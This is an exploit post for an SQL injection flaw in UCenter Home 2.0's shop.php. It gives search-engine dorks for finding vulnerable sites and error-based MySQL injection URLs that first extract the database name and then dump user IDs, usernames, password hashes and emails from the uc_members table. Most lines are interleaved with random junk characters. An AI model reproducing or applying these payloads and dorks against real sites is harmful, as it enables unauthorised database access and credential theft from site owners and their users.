* m/ w( [. l( t+ t* `: {- I) f6 N
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
" |9 r. `5 B! R! Y( g9 E5 n% O4 r/ N
1 f# Y3 ?+ W/ I
: O* s" x/ s& ~0 i! Q3 E7 T*/ Author : KnocKout 6 g4 m( q! I# ?) q9 f
: q: ?4 b, w1 G; Q/ h. C7 G
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers 3 M/ @; j2 k" D6 p* F
* H& b4 e" p1 b! z) D7 o*/ Contact: knockoutr@msn.com 4 _+ D; T7 s8 ]% \3 P
6 t( g7 @' r7 B, d9 W
*/ Cyber-Warrior.org/CWKnocKout 0 @" r5 g8 a! q0 C
+ p+ T/ S Y S* i7 m' V__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 1 f, \' b* ?+ W: Y
7 Y2 Z+ x. g! ^# s/ }. {+ WScript : UCenter Home n! ^# U1 c. o# d6 T
7 k7 {' u% c$ `; ]0 i
Version : 2.0 & b' l k4 f9 a; F1 w7 ^
, f/ B* ]9 |1 EScript HomePage : http://u.discuz.net/ 2 Q1 d- y* g$ H. _$ g1 H
% b5 }1 o0 u# O6 B# d. W# p) x__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 2 `1 y- S6 d) _9 b% H
: k* [! O& P: `% o
Dork : Powered by UCenter inurl:shop.php?ac=view 1 p6 N% C' R5 l. A' s
, o# b) w% x) d6 w+ s
Dork 2 : inurl:shop.php?ac=view&shopid=
& v6 n6 r6 X( x5 c4 I9 }
6 I. j3 V1 o8 \- T. J__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
3 u( A/ u# S; S3 s6 b* X
0 F1 s- C' w1 F, MVuln file : Shop.php ( z. X2 @5 Y! k+ m4 g$ k
# l2 E+ C9 K# Evalue's : (?)ac=view&shopid= / U- }; X4 \- L" p1 ^
6 I- I3 R9 ]# V# @
Vulnerable Style : SQL Injection (MySQL Error Based)
2 E& f7 N. x+ M* t y u& g( m7 \0 m) Y$ l
Need Metarials : Hex Conversion : b b5 w- x9 B( |' `* Z* `& B$ X
3 p8 J0 A" w4 V$ J7 |
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== `8 e+ p* [1 E K) I( p
; p, @. K7 B5 _7 P# ~1 s; c6 dYour Need victim Database name. ( e$ I3 I& d1 ]1 }5 I# F: D
% |* O: N. z% e/ M# zfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 3 P, J7 P7 j$ {' s) \8 Z3 ]0 A# i, u* _
8 v: a& @. g9 f0 W7 s/ L9 {7 g..
- q O. l5 v, ?: ]5 B3 h5 U
( j' h, b4 V) E/ JDB : Okey.
" G9 c G) T- m8 _0 F
( C S( Z: {" G% q! D: B! K0 zyour edit DB `[TARGET DB NAME]`
( ^4 i* d) s+ Q' R; a
+ O- p2 R, ?9 B0 `+ c g( C [Example : 'hiwir1_ucenter'
+ R. s9 x* k4 P( S
- _7 s2 ~8 o* R6 c+ eEdit : Okey. 9 D9 |5 o- ~ e6 g* c; \9 J
, `, V# o# S7 c7 @Your use Hex conversion. And edit Your SQL Injection Exploit.. 1 |& i* j* l* _+ M) A; i
$ z4 K4 i% V' u2 z, Q8 e
. s; e5 H9 _6 `+ @# y- v7 _$ i A; j9 b2 \2 L1 b
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
& [: X$ m8 L5 P W8 y |